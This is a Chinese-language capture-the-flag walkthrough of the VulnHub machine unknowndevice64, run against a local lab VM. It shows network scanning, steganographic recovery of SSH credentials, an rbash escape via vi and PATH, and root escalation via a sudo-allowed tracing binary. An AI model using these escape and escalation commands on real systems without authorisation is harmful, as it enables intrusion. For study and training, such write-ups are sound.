信息收集:
靶机地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/
(1)ip扫描
nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:D1:FC:88'
![](https://img-blog.csdnimg.cn/img_convert/e9e2a78c5306b84d285892bfc3dd2a37.png)
(2)端口扫描
nmap -p- -A 192.168.254.149
开放端口:1337(ssh)、31337(http)
![](https://img-blog.csdnimg.cn/img_convert/8aadbca4d8e1800305f5e04fd0889b1d.png)
(3)目录扫描
dirb http://192.168.254.149:31337/
![](https://img-blog.csdnimg.cn/img_convert/e92a790f5118a55f71b59cfb41698808.png)
(4)访问31337端口,没什么发现
![](https://img-blog.csdnimg.cn/img_convert/148ccd4a6d607ae720384892b596d05f.png)
(5)f12查看源码,发现有一个图片 key_is_h1dd3n.jpg
![](https://img-blog.csdnimg.cn/img_convert/19878ea030c8affb2f6ec4a900cdb918.png)
(6)访问图片,上面写着 隐藏的秘密,可能是图片隐写
![](https://img-blog.csdnimg.cn/img_convert/2a66ea7107b5e238d9040678b563f945.png)
(7)将图片下载下来,在kali中使用 steghide 工具提取信息
sudo apt-get update
sudo apt-get install steghide
steghide extract -sf key_is_h1dd3n.jpg
![](https://img-blog.csdnimg.cn/img_convert/a30f83f085958a5cc211901ba3900a02.png)
(8)显示需要密码,根据名字可以知道密码为 h1dd3n,得到一个h1dd3n.txt
![](https://img-blog.csdnimg.cn/img_convert/30c2ef913dffb4b7360f4cdaf4639679.png)
(9)查看文件内容,是 brainfuck 加密
![](https://img-blog.csdnimg.cn/img_convert/d628420c44d36b164b3e303093009160.png)
(10)使用工具解密,得到账号密码
ud64:1M!#64@ud
![](https://img-blog.csdnimg.cn/img_convert/c8e9fc314b063636589a4c416e94f5e6.png)
getshell:
(1)登录ssh
ssh ud64@192.168.254.149 -p 1337
1M!#64@ud
![](https://img-blog.csdnimg.cn/img_convert/f0b5465a529366532626f5f3b2090c7f.png)
(2)发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令
![](https://img-blog.csdnimg.cn/img_convert/10b07bee9c0d3ea234a1788e443f4fd4.png)
(3)vi 和 export 命令可用,vi 绕过,还是有部分命令无法执行
vi
按shift+:
!/bin/bash
![](https://img-blog.csdnimg.cn/img_convert/840521b8f6982553dde6ffa6b85949f9.png)
(4)export 配置环境变量绕过
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
![](https://img-blog.csdnimg.cn/img_convert/5fb7473c19fa45c750649f2d37fd6156.png)
提权:
(1)sudo -l,查看当前权限
![](https://img-blog.csdnimg.cn/img_convert/4b9e288a7b8c9c986cc40e366a55993d.png)
(2)sysud64 可以执行 root 权限的命令,直接尝试提权
sudo sysud64
![](https://img-blog.csdnimg.cn/img_convert/fa76a63f8136cc2fc26f1c249989074f.png)
(3)失败了,sysud64 -h 查看帮助,
sudo sysud64 -h
![](https://img-blog.csdnimg.cn/img_convert/a90291395d98a73159e2f8a2faabd29a.png)
(4)可以使用
-o file send trace output to FILE instead of stderr
(5)尝试提权,提权成功
sudo sysud64 -o /dev/null /bin/bash
![](https://img-blog.csdnimg.cn/img_convert/c631fa66507fa08ffd1d9a8846f0c01d.png)